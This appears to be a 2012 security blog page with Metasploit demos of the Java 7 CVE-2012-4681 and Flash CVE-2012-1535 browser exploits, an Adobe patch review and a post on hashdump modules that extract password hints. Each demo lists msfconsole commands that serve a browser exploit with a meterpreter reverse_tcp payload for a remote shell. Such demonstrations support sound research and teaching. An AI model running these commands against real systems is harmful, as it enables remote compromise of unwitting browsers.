Java 7 Applet RCE 0day Gondvv CVE-2012-4681 Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability reported to ZDI by James Forshaw (tyranid)
Vulnerability reported to the vendor by ZDI the 2012-07-24.
Vulnerability found exploited in the wild and discovered by Michael Schierl
First details of the vulnerability the 2012-08-26
Source code of the vulnerability provided by jduck the 2012-08-26
Metasploit PoC provided the 2012-08-27
Patched through out-of-band Oracle Security Alert for CVE-2012-4681 the 2012-08-30.

PoC provided by :

Unknown
jduck
sinn3r
juan vazquez

Reference(s) :

CVE-2012-4681
OSVDB-84867
BID-55213
Zero-Day Season is Not Over Yet
Java 7 0-Day vulnerability information and mitigation
ZDI-12-197
Oracle Security Alert for CVE-2012-4681

Affected version(s) :

Oracle JSE (Java Standard Edition) version 1.7.0_06-b24 and previous.

Tested on Windows XP Pro SP3 & Ubuntu 12.04 with :

Internet Explorer 8 & Firefox 14.0.1 & Chrome
Oracle JSE 1.7.0_06-b24

Description :

This module exploits a vulnerability in Java 7, which allows an attacker to run arbitrary Java code outside the sandbox. This flaw is also being exploited in the wild, and there is no patch from Oracle at this point. The exploit has been tested to work against: IE, Chrome and Firefox across different platforms.

Commands :

use exploit/multi/browser/java_jre17_exec
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

Windows 0day exploitation with Internet Explorer, Firefox and chrome :

Linux Ubuntu 12.04 exploitation with Firefox :

Adobe APSB12-19 Flash Player Update Review

Vulnerability Management,

Adobe has release, the 21 August 2012, just one week after his Patch Tuesday release, an out of band patch APSB12-19 updating Flash Player 10.x and 11.x. This update correct 6 vulnerabilities, all these vulnerabilities have a Critical severity rating and 5 of the 6 vulnerabilities have a base CVSS score of 10.0.

CVE-2012-4163, with a CVSS base score of 10.0, how could lead to code execution, has been discovered and privately reported by Xu Liu of Fortinet’s FortiGuard Labs.

CVE-2012-4164, with a CVSS base score of 10.0, how could lead to code execution, has been discovered and privately reported by Will Dormann of CERT.

CVE-2012-4165 and CVE-2012-4166, with both a CVSS base score of 10.0, how could lead to code execution, has been discovered and privately reported by Honggang Ren of Fortinet’s FortiGuard Labs.

CVE-2012-4167, with a CVSS base score of 10.0, how could lead to code execution, has been discovered and privately reported by Alexander Gavrun through iDefense’s Vulnerability Contributor Program.

CVE-2012-4168, with a CVSS base score of 4.3, how could lead to information leak, has been discovered and privately reported by Opera Software ASA.

Metasploit Windows User Password Hints Decode Auxiliary Modules

Metasploit,

Metasploit provide some Microsoft Windows auxiliary modules who will permit you to dump local accounts from the SAM Database. These modules, “post/windows/gather/hashdump” and “post/windows/gather/smart_hashdump”, have been updated recently with addition of Windows users password hints. A nice blog post “All Your Password Hints Are Belong to Us” from claudijd explain how they have successfully extract/decode user password hints from the Windows registry. Here under a small video demonstration of these modifications.

Nice job from @claudijd, @reynoldsrb, @_sinn3r and @TheLightCosine for these nice upgrades 🙂

CVE-2012-1535 Adobe Flash Player Vulnerability Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability found exploited in the wild and reported by Alexander Gavrun
Vulnerability reported by the vendor the 2012-08-14
Metasploit PoC provided the 2012-08-17

PoC provided by :

Alexander Gavrun
juan vazquez
sinn3r

Reference(s) :

APSB12-18
CVE-2012-1535
OSVDB-84607
BID-55009

Affected version(s) :

Adobe Flash Player 11.3.300.270 and earlier versions for Windows and Macintosh
Adobe Flash Player 11.2.202.236 and earlier versions for Linux
Flash Player installed with Google Chrome earlier version 21.0.1180.79.

Tested on Windows 7 Integral with :

Internet Explorer 9
Adobe Flash Player 11.3.300.268

Description :

This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player before 11.3.300.271. By supplying a corrupt Font file used by the SWF, it is possible to gain arbitrary remote code execution under the context of the user, as exploited in the wild.

Commands :

use exploit/windows/browser/adobe_flash_otf_font
set SRVHOST 192.168.178.100
set ROP JRE
set TARGET 6
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid